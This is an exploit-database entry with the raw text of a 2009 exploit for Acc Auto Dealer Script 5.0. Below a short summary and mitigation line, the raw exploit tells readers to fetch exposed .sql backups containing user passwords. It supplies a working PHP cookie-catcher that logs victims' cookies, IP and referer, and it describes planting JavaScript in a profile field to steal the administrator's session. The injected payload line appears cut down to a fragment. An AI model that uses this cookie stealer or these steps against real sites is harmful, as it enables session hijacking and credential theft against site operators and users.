header-logo
Suggest Exploit
vendor:
Auto Dealer Script
by:
bi0
8.8
CVSS
HIGH
Persistent XSS / SQL Backup
79
CWE
Product Name: Auto Dealer Script
Affected Version From: 5
Affected Version To: 5
Patch Exists: No
Related CWE: N/A
CPE: cpe:a:accscripts:auto_dealer_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Acc Auto Dealer Script [ Persistent XSS / SQL backup ]

Acc Auto Dealer Script is vulnerable to persistent XSS and SQL Backup. An attacker can inject malicious JavaScript code into the Description field of the user profile, which will be executed when the site admin visits the user profile. Additionally, the attacker can access the SQL backup file which contains user credentials.

Mitigation:

The application should validate user input and filter out any malicious code.
Source

Exploit-DB raw data:

# Vendor : http://www.accscripts.com/autos/download.html
# Version: 5.0


                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Acc Auto Dealer Script [ Persistent XSS / SQL backup ]
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,redking,Zer0flag,sp1r1t and ssteam.ws ...
#
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
#    [SQL Backup]
#
#    http://server/[path]/temp/
#    and serach for .sql .You can find users & passwords
#
#    [ Persistent XSS ]
#
#    At the Auto Dealer Script you can register as an normal user and at your Control Panel
#    You can modify "Description" and put there an javascript code to steal cookies, Then if
#    Site admin visits your profile you can steal their cookies. EX :
#
#    // Cookie Catcher "cookie.php"
#    You must Host somewhere cookie.php
#=======================================================================

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

#=========================================================================
#
#    // And at your Description type :
#
#=========================================================================

"/>

#=========================================================================
#
#    Now if site admin visits you'r profile their cookies will be saved at
#    http://host/cookie.html
#
[#]------------------------------------------------------------------------------------------[#]

#EOF